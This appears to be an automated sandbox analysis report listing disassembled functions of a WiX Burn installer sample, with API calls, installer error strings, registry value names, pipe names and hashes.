                                                                                                                                                                                                                                                                                                  • Failed to execute MSU package., xrefs: 00889EFB
                                                                                                                                                                                                                                                                                                  • Failed to get cache thread exit code., xrefs: 0088A031
                                                                                                                                                                                                                                                                                                  • Failed to wait for cache check-point., xrefs: 00889FE7
                                                                                                                                                                                                                                                                                                  • apply.cpp, xrefs: 00889FDD, 0088A027
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3703294532-2662572847
                                                                                                                                                                                                                                                                                                  • Opcode ID: 61d71449d922faebcd968409f1c41b76d913ac6565b825a978f600bde88976d9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f2c54050c1979154d5b901545bb92a49a23b48136885e21fc82933de166f40f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61d71449d922faebcd968409f1c41b76d913ac6565b825a978f600bde88976d9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04717C71A0122AEFDB14EF64C841EBE7BB8FB44B10F15416AF940F7380D675AE009BA1
                                                                                                                                                                                                                                                                                                  Function 0086F210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 008A3B3E
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,008B0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0086F440
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0086F28D,008B0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008A14BB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseValueVersion
                                                                                                                                                                                                                                                                                                  • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2348918689-2631711097
                                                                                                                                                                                                                                                                                                  • Opcode ID: e11b3d0dc0f784a688ca4ade7b59dae5f93fe0df53e43d6e1f5263ecaeb02f0f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 850b39d6c2fab5165a22136bdd5ec8d814dbdaa0513ce200ef645011ee4ff82b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e11b3d0dc0f784a688ca4ade7b59dae5f93fe0df53e43d6e1f5263ecaeb02f0f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94510532D4172ABBDF219AA8DC5AAEFBA64FB00710F160135FA10F6352DB75D9009BC5
                                                                                                                                                                                                                                                                                                  Function 0088CC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(771A8FB0,00000002,00000000), ref: 0088CC9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00874D8D: UuidCreate.RPCRT4(?), ref: 00874DC0
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,00882401,?,?,00000000,?,?,?), ref: 0088CD7B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0088CD85
                                                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(00882401,?,?,00000000,?,?,?,?), ref: 0088CDBD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: lstrlenW.KERNEL32(?,?,00000000,?,008AB500,?,00000000,?,0086452F,?,008AB500), ref: 008754FD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: GetCurrentProcessId.KERNEL32(?,0086452F,?,008AB500), ref: 00875508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0086452F,?,008AB500), ref: 0087553F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0086452F,?,008AB500), ref: 00875554
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087555E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: Sleep.KERNEL32(00000064,?,0086452F,?,008AB500), ref: 00875593
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0086452F,?,008AB500), ref: 008755B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 008755D1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: WriteFile.KERNEL32(?,0086452F,008AB500,00000000,00000000,?,0086452F,?,008AB500), ref: 008755EC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 00875607
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008A0A38
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0A28: GetLastError.KERNEL32(?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008A0A46
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0088CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0088CE41
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0088CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0088CE50
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0088CBEF,?,?,?,?,?,00000000,?,?,?), ref: 0088CE67
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate embedded command., xrefs: 0088CD54
                                                                                                                                                                                                                                                                                                  • Failed to process messages from embedded message., xrefs: 0088CE04
                                                                                                                                                                                                                                                                                                  • Failed to create embedded pipe., xrefs: 0088CD27
                                                                                                                                                                                                                                                                                                  • Failed to wait for embedded executable: %ls, xrefs: 0088CE24
                                                                                                                                                                                                                                                                                                  • Failed to create embedded pipe name and client token., xrefs: 0088CD00
                                                                                                                                                                                                                                                                                                  • Failed to wait for embedded process to connect to pipe., xrefs: 0088CDDF
                                                                                                                                                                                                                                                                                                  • burn.embedded, xrefs: 0088CD38
                                                                                                                                                                                                                                                                                                  • Failed to create embedded process at path: %ls, xrefs: 0088CDB3
                                                                                                                                                                                                                                                                                                  • embedded.cpp, xrefs: 0088CDA6
                                                                                                                                                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 0088CD40
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 875070380-3803182736
                                                                                                                                                                                                                                                                                                  • Opcode ID: 29203672484ce5b633b7d0a22899ab9861e2cd82f7b9ea04659bb7b75b18a3e7
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbc808df950bbaae1b0a3cc1ee95c7bc6b7b3aa90efe99139ad6a9fe2821f7ba
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29203672484ce5b633b7d0a22899ab9861e2cd82f7b9ea04659bb7b75b18a3e7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7516E72D4022DBBDF12AAA8DC06FDEBBB8FB04711F114125FA04F6255D7749A409BE1
                                                                                                                                                                                                                                                                                                  Function 008A7F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,008A8468,00000001,?), ref: 008A7F9E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,008A8468,00000001,?), ref: 008A7FB9
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,008A8468,00000001,?), ref: 008A7FD4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A8040
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A8064
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A8088
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A80A8
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(006C0064,?,008A8468,00000001,?), ref: 008A80C3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                                                                                                                                                                                                  • API String ID: 1657112622-2492263259
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fdf0c126b41e951381c8c90bd20cd35491e142d5eac4c1a921296b1ce5524f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 640132b8ae647b3b5cfa5ae9f9eddf16177618ca352b107190c0ce89e466a681
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf0c126b41e951381c8c90bd20cd35491e142d5eac4c1a921296b1ce5524f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C516231648A12FBEB205F54CC45F167A65FB16730F204314FA35EEAE1DBB5E8548BA0
                                                                                                                                                                                                                                                                                                  Function 0086A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A0B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-2134270738
                                                                                                                                                                                                                                                                                                  • Opcode ID: 67414430a9fb632e1dcb9f49db1e1a4e54698126c66f2a9974de120ed64fcb88
                                                                                                                                                                                                                                                                                                  • Instruction ID: 583c5c0f6d5dc572d40b2556d72bb7f342910ffac0d8ea27b2a1aa0de9c34ec6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67414430a9fb632e1dcb9f49db1e1a4e54698126c66f2a9974de120ed64fcb88
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D661F432D40119FBDB29AAA8CD95EAE7B78FB06714F120065F901FA741D232DE409F93
                                                                                                                                                                                                                                                                                                  Function 0086ECBE Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086EE4C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086EE04
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Filename, xrefs: 0086ED7F
                                                                                                                                                                                                                                                                                                  • Failed to get next node., xrefs: 0086EEB3
                                                                                                                                                                                                                                                                                                  • Failed to get @Path., xrefs: 0086EE95
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for software tag structs., xrefs: 0086ED4B
                                                                                                                                                                                                                                                                                                  • Failed to select software tag nodes., xrefs: 0086ECEE
                                                                                                                                                                                                                                                                                                  • registration.cpp, xrefs: 0086ED41
                                                                                                                                                                                                                                                                                                  • Regid, xrefs: 0086ED9A
                                                                                                                                                                                                                                                                                                  • Failed to get software tag count., xrefs: 0086ED13
                                                                                                                                                                                                                                                                                                  • Failed to get @Regid., xrefs: 0086EE9F
                                                                                                                                                                                                                                                                                                  • Failed to convert SoftwareTag text to UTF-8, xrefs: 0086EE81
                                                                                                                                                                                                                                                                                                  • Failed to get @Filename., xrefs: 0086EEA9
                                                                                                                                                                                                                                                                                                  • Failed to get SoftwareTag text., xrefs: 0086EE8B
                                                                                                                                                                                                                                                                                                  • Path, xrefs: 0086EDB2
                                                                                                                                                                                                                                                                                                  • SoftwareTag, xrefs: 0086ECCD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 336948655-1068704183
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8cf02a440813095d3b2315a10cff749383baa03c589af7ed9200ed642a1234ef
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4eb29738a3705e1fe8aafefd7f20d040200531e483183b24ab938dc9ae45e6f9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cf02a440813095d3b2315a10cff749383baa03c589af7ed9200ed642a1234ef
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1518039E0172ABBDB219F98C895EAEBBA8FF04750F524169F911EB340C775DE008791
                                                                                                                                                                                                                                                                                                  Function 00874B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00874B84
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00874B92
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00874BB6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 408151869-3212458075
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b54f8a9d2faad1a26bdf16ea905df0556caf07a615d6c4a70c8bb1a9a44d608
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6e3626cd51d47b659a0ed064466c3b77f0fa85cf8bb3f87aa278f93974d2805b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b54f8a9d2faad1a26bdf16ea905df0556caf07a615d6c4a70c8bb1a9a44d608
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6417632D82636BBEB2216E48D06F9A7A64FF11730F129221FE18FB295D774DD0086D5
                                                                                                                                                                                                                                                                                                  Function 0086F585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,008704DF,InstallerVersion,InstallerVersion,00000000,008704DF,InstallerName,InstallerName,00000000,008704DF,Date,InstalledDate,00000000,008704DF,LogonUser), ref: 0086F733
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14F4: RegSetValueExW.ADVAPI32(00020006,008B0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0086F335,00000000,?,00020006), ref: 008A1527
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseValue
                                                                                                                                                                                                                                                                                                  • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                                                                                                                                                                  • API String ID: 3132538880-2703781546
                                                                                                                                                                                                                                                                                                  • Opcode ID: f00f94da030b2f62556437ded91efec81b1eb0dc3e41f259e9e4bda9cf9f5756
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b5e99dd25fd3f8097388777ca4a170601f3ebebb1e34d7627f0b2b4d64a0678
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f00f94da030b2f62556437ded91efec81b1eb0dc3e41f259e9e4bda9cf9f5756
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2410632A406A6B7DF13A658EC06EEF7A65FB11B14F160170FA10F6363DB75DE009681
                                                                                                                                                                                                                                                                                                  Function 0087E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 0087E7FF
                                                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 0087E82B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E836
                                                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,008B9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0087E89D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E8A7
                                                                                                                                                                                                                                                                                                  • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0087E945
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
